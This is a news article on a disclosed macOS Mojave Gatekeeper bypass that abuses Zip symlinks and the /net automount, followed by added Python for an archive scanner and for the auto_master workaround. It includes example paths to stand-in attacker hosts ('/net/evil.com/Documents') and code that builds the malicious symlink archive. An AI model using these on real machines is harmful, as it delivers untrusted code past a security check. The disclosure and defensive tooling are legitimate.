Gatekeeper Bug in MacOS Mojave Allows Malware to Execute


Researcher discloses vulnerability in macOS Gatekeeper security feature that allows the execution of malicious code on current version of the OS.

Researcher Filippo Cavallarin has disclosed a bug in the macOS security feature Gatekeeper that allows malicious code execution on systems running the most recent version of Mojave, 10.14.5.

macOS Gatekeeper is an Apple security feature that enforces code signing and verifies downloaded apps before users run them, with the goal of preventing malicious files from being executed. For software downloaded from the internet, Gatekeeper checks the developer signature and requires the user’s explicit consent before an unidentified app is opened.

“On MacOS X version <= 10.14.5 (at time of writing) it is possible to easily bypass Gatekeeper in order to execute untrusted code without any warning or user’s explicit permission,” wrote Cavallarin, the CEO of Segment, an Italian security firm.

Apple has not released a patch at this time, but a workaround that mitigates the vulnerability is available.

The researcher said he notified Apple of the flaw on February 22. Since then, Apple has not issued a patch, the researcher noted. “This issue was supposed to be addressed, according to the vendor, on May 15th 2019 but Apple started dropping my emails. Since Apple is aware of my 90-day disclosure deadline, I make this information public,” he wrote.

The flaw is tied to how Gatekeeper handles external drives and network shares. According to Cavallarin, Gatekeeper treats both as safe locations and lets any application stored on them run without a check. In a proof-of-concept attack, the researcher chained this behavior with a second legitimate macOS feature, automount, to build a working attack scenario.

“The first legit feature is automount (aka autofs) that allows a user to automatically mount a network share just by accessing a ‘special’ path, in this case, any path beginning with ‘/net/’. For example ls /net/evil-attacker.com/sharedfolder/ will make the OS read the content of the ‘sharedfolder’ on the remote host (evil-attacker.com) using NFS,” Cavallarin describes.

Next, the researcher points out that a Zip archive can contain “symbolic links pointing to an arbitrary location (including automount endpoints) and that the software on macOS that is responsible to decompress Zip files does not perform any check on the symlinks before creating them.”

Symlinks, short for symbolic links, are filesystem entries that point to (or can be crafted to point to) a file or directory at another path. macOS, like other Unix-like systems, resolves them transparently, so a symlink inside an extracted archive can lead anywhere on the system, including into an automount path such as /net/.

The researcher also posted a video demonstration of the vulnerability.

The attack requires the adversary to create a specially crafted Zip archive containing a symbolic link that points to an automount endpoint the attacker controls. In the example from the write-up, a link named “Documents” inside the archive points to “/net/evil.com/Documents”, so when the victim opens the extracted folder, macOS mounts the attacker’s NFS share in its place.
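The two primitives described above, a Zip entry that is a symlink and a target under /net/, are easy to reproduce and easy to detect. The following Python is an added example, not Cavallarin’s proof of concept: it builds such an archive in memory and then scans any archive for symlink entries whose target escapes the extraction directory. The host name evil.com and the link name Documents are the article’s placeholders; the inclusion of /home/ as a second automount prefix is an assumption based on the other default autofs map, not something the article states.

```python
"""Build a Zip archive carrying a symlink into an automount path, then scan it.

Added example; not the researcher's PoC. 'evil.com' and 'Documents' are the
placeholders used in the article and are not real attacker infrastructure.
"""
import io
import stat
import zipfile

# Automounter prefixes macOS resolves on first access. /net is the one abused
# in the article; /home is the other stock autofs map (assumption, listed so
# the scanner also flags it).
AUTOMOUNT_PREFIXES = ("/net/", "/home/")


def build_symlink_zip(link_name: str, target: str) -> bytes:
    """Return a Zip archive containing a single symlink entry link_name -> target.

    A symlink is stored as an ordinary entry whose Unix mode (upper 16 bits of
    external_attr) has S_IFLNK set and whose file data is the target path.
    This is the layout `zip -y` produces and that Archive Utility honours.
    """
    info = zipfile.ZipInfo(link_name)
    info.create_system = 3                          # 3 = Unix, so the mode bits are trusted
    info.external_attr = (stat.S_IFLNK | 0o777) << 16
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(info, target)                   # link target is the entry's content
    return buf.getvalue()


def symlink_entries(data: bytes):
    """Yield (name, target) for every symlink entry in a Zip archive."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            mode = info.external_attr >> 16
            if stat.S_ISLNK(mode):
                yield info.filename, zf.read(info).decode("utf-8", "replace")


def suspicious_symlinks(data: bytes) -> list:
    """Return [(name, target, reason)] for symlinks that leave the extraction directory.

    'automount'  : target under /net/ or /home/ (the Gatekeeper-trusted location
                   abused in the article)
    'absolute'   : any other absolute target
    'traversal'  : relative target that climbs out of the archive root with '..'
    """
    findings = []
    for name, target in symlink_entries(data):
        if target.startswith(AUTOMOUNT_PREFIXES):
            findings.append((name, target, "automount"))
        elif target.startswith("/"):
            findings.append((name, target, "absolute"))
        elif ".." in target.split("/"):
            findings.append((name, target, "traversal"))
    return findings


def is_safe_archive(data: bytes) -> bool:
    """True when no symlink in the archive points outside its own tree."""
    return not suspicious_symlinks(data)


if __name__ == "__main__":
    malicious = build_symlink_zip("Documents", "/net/evil.com/Documents")
    for name, target, reason in suspicious_symlinks(malicious):
        print(f"{name} -> {target}  [{reason}]")
```

Running the script prints the single finding for the constructed archive. The scanner reads the mode bits from the central directory rather than extracting anything, so it can sit in a mail gateway or download hook; `zipinfo` shows the same entries with an `l` in the permissions column if you want to confirm a sample by hand.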

“Now the victim is in a location controlled by the attacker but trusted by Gatekeeper, so any attacker-controlled executable can be run without any warning. The way Finder is designed (ex hide .app extensions, hide full path from titlebar) makes this technique very effective and hard to spot,” Cavallarin wrote.

Mitigating these attacks is fairly simple: a three-step process disables the /net automount map so that paths under /net/ no longer trigger a mount.

  1. “Edit /etc/auto_master as root
  2. Comment the line beginning with ‘/net’
  3. Reboot”
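The three steps above can be audited and applied from a script, which matters when the workaround has to be rolled out to a fleet. The following Python is an added example, not part of the original write-up: it operates on the text of /etc/auto_master so the logic can be tested offline, and the sample map below is constructed to match the format of the stock macOS file, not copied from any specific system. Running it against the real file requires root.

```python
"""Audit and patch /etc/auto_master to disable the /net automount map.

Added example, not part of the original advisory. The sample map is
constructed to resemble the default macOS file with /net enabled.
"""
import re
import sys

# Constructed sample in the stock auto_master format (tabs between columns).
SAMPLE_AUTO_MASTER = """\
#
# Automounter master map
#
+auto_master\t\t# Use directory service
/net\t\t\t-hosts\t\t-nobrowse,hidefromfinder,nosuid
/home\t\t\tauto_home\t-nobrowse,hidefromfinder
/Network/Servers\t-fstab
/-\t\t\t-static
"""

# A map line is a mount point followed by whitespace. Matching /net as a whole
# token keeps a hypothetical "/network" entry untouched.
NET_LINE = re.compile(r"^/net(?=\s)", re.MULTILINE)


def net_automount_enabled(text: str) -> bool:
    """True if the map still contains an uncommented /net line."""
    return NET_LINE.search(text) is not None


def disable_net_automount(text: str) -> tuple:
    """Return (patched_text, changed); comments out every active /net line.

    Idempotent: a map whose /net line is already commented comes back unchanged.
    """
    patched, count = NET_LINE.subn("#/net", text)
    return patched, count > 0


def main(path: str = "/etc/auto_master") -> None:
    """Apply the workaround in place (root required), keeping a .bak copy."""
    with open(path) as fh:
        original = fh.read()
    patched, changed = disable_net_automount(original)
    if not changed:
        print(f"{path}: /net automount already disabled")
        return
    with open(path + ".bak", "w") as fh:
        fh.write(original)
    with open(path, "w") as fh:
        fh.write(patched)
    print(f"{path}: /net automount disabled, backup written to {path}.bak")


if __name__ == "__main__":
    main(*sys.argv[1:])
```

After patching, the article’s third step is a reboot; `sudo automount -vc` reloads the maps and flushes the automounter cache without one, and `ls /net/` should then show an empty or static directory instead of triggering a mount. The `net_automount_enabled` check is the piece to run across a fleet to find machines where the workaround is missing.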

